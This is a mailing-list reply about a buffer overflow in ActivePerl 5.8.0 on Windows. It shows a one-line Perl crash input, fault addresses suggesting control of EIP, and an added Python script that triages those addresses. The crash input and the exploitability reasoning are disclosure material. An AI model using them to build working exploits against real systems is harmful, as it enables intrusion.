
Re: Buffer Overflow in ActivePerl ?

"Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx> wrote:

> i played around with ActiveState's ActivePerl for Win32, and crashed 
> Perl.exe with the following command:
> perl -e "$a="A" x 256; system($a)"

Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus 
all but last week's security patch:

   perl -e "$a="A" x 256; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x00657865.  The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

   C:\>perl -e "$a="A" x 259; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x65004141.  The memory could not be "written".

and we seem to get control of EIP.  Coincidence?  Try yet two more:

   C:\>perl -e "$a="A" x 261; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x41414141.  The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless 
perhaps a script processor on a web server can be cajoled into doing 
something with this?  (Not at all familiar with the innards of Windows 
web servers and their relationship to their CGI, etc. processors...)

Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
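Added example, not part of the post above: a small Python crash-triage helper that decodes the three fault addresses quoted in the reply as little-endian bytes and counts how many of them are the caller's 'A' fill byte, which is the check a defender runs to decide whether a faulting pointer is input-controlled. The command lengths and addresses are the ones in the post; the verdict strings are my own labels.

```python
# Added example (not from the original post): decode the fault addresses
# reported for perl -e "$a="A" x N; system($a)" and check how much of the
# faulting pointer is made of the caller-supplied fill byte.
from dataclasses import dataclass

# (number of 'A's passed to system(), fault address) as quoted in the post
REPORTS = [(256, 0x00657865), (259, 0x65004141), (261, 0x41414141)]

FILL = ord("A")  # the byte the command string consists of


def decode_address(addr: int) -> bytes:
    """Return the 4 bytes that sat in the overwritten slot, in memory order.

    x86 is little-endian, so the low-order byte of the reported value is
    the first byte in memory.
    """
    return addr.to_bytes(4, "little")


@dataclass
class Triage:
    cmd_len: int
    slot: bytes       # raw bytes of the faulting pointer, memory order
    controlled: int   # how many of the 4 bytes equal the fill byte
    verdict: str


def triage(cmd_len: int, addr: int) -> Triage:
    """Classify one crash report by how much of the pointer the input set."""
    slot = decode_address(addr)
    controlled = sum(1 for b in slot if b == FILL)
    if controlled == 4:
        verdict = "pointer fully input-controlled"
    elif controlled:
        verdict = "pointer partially input-controlled"
    else:
        verdict = "pointer not input-controlled (runtime data)"
    return Triage(cmd_len, slot, controlled, verdict)


def triage_all(reports=REPORTS):
    return [triage(n, a) for n, a in reports]


if __name__ == "__main__":
    for t in triage_all():
        shown = t.slot.decode("latin-1").replace("\x00", "\\0")
        print(f"{t.cmd_len:>4} A's -> slot={shown!r:10} "
              f"controlled={t.controlled}/4  {t.verdict}")
```

With 256 A's the slot decodes to "exe\0", bytes the caller never supplied, so that run alone is not conclusive; the 259 and 261 runs are the ones showing the pointer tracking the input.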